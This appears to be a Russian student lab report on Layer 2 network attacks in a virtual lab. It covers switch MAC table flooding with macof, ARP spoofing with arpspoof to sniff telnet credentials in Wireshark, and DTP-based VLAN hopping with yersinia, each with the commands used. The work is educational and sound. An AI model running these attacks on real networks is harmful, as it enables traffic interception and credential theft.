# Networks. Практическая работа №2
## 2.1 Основные атаки на уровень L2
### 2.1.1 Переполнение таблиц коммутации
Для проведения данной атаки установим утилиту dsniff на Kali Linux
```bash=
apt update
apt install dsniff
```
Утилита установлена

На несколько секунд включим атаку командой
```bash=
macof
```
Результат выполнения

Проверим переполнения таблицы коммутации на Switch7 командой
```bash=
show mac address-table
```
Таблица переполнена


Запустим пинг на одном из устройств. Видим что есть проблемы с сетью.


### 2.1.2 ARP-Spoofing
На машине Win7 есть Putty, поэтому компонент telnet добавлять не будем.

Попытаемя подключится к Switch7 командой
```bash=
telnet 192.168.1.100
```
Подключение успешное

На Kali Linux установим параметр net.ipv4.ip_forward=1 в файле /etc/sysctl.conf

Применим изменения командой
```bash=
sysctl -p /etc/sysctl.conf
```
Изменения применены

Начнем атаку командой
```bash=
arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100
```
Атака началась. 192.168.1.50 -адрес Win7, 192.168.1.100 -адрес Switch7

Включим wireshark и найдем данные аутентификации telnet. Видим как посимвольно передаются сначала имя

А затем и пароль

### 2.1.3 VLAN hopping
На Switch7 поместим Win10 во Vlan10 и настроим trunk в сторону Switch9 следующими командами
```bash=
interface e1/2
switchport mode access
switchport access vlan 10
exit
interface e0/0
switchport trunk encapsulation dot1q
seitchport mode trunk
```
Результат

На Switch9 тоже настроим trunk в сторону Switch7 (e0/0), Switch8 (e0/1), Router (e0/2)
```bash=
interface e0/0
switchport trunk encapsulation dot1q
switchport mode trunk
interface e0/1
switchport trunk encapsulation dot1q
switchport mode trunk
interface e0/2
switchport trunk encapsulation dot1q
switchport mode trunk
```
На Switch8 настроим trunk в сторону Switch9 и access в сторону машин
```bash=
interface e0/1
switchport trunk encapsulation dot1q
switchport mode trunk
do write
```

На Router настроим шлюз для Vlan10
```bash=
interface e0/1.10
encapsulation dot1q 10
ip address 192.168.10.1 255.255.255.0
do write
```

Настроим Win10

Win10 получает доступ к Kali через роутер.
Огранизуем атаку VLAN hopping, для того что бы получить связь в рамках броадкаста.
На Kali Linux установим yersinia
```bash=
apt install yersinia
```

Запустим yersinia
```bash=
yersinia -G
```

Проведем атаку на протокол DTP

Конфигурация интерфейсов Kali
```bash=
modprobe 8021q
vconfig add eth0 10
ifconfig eth0.10 up
```

Установим адрес 192.168.10.50 на интерфейс Kali Linux
```bash=
ip address add 192.168.10.50/24 dev eth0.10
```
Сгененрируем трафик в сторону Win10

Посмотрим его в wireshark
!
На этом данная работа закончена.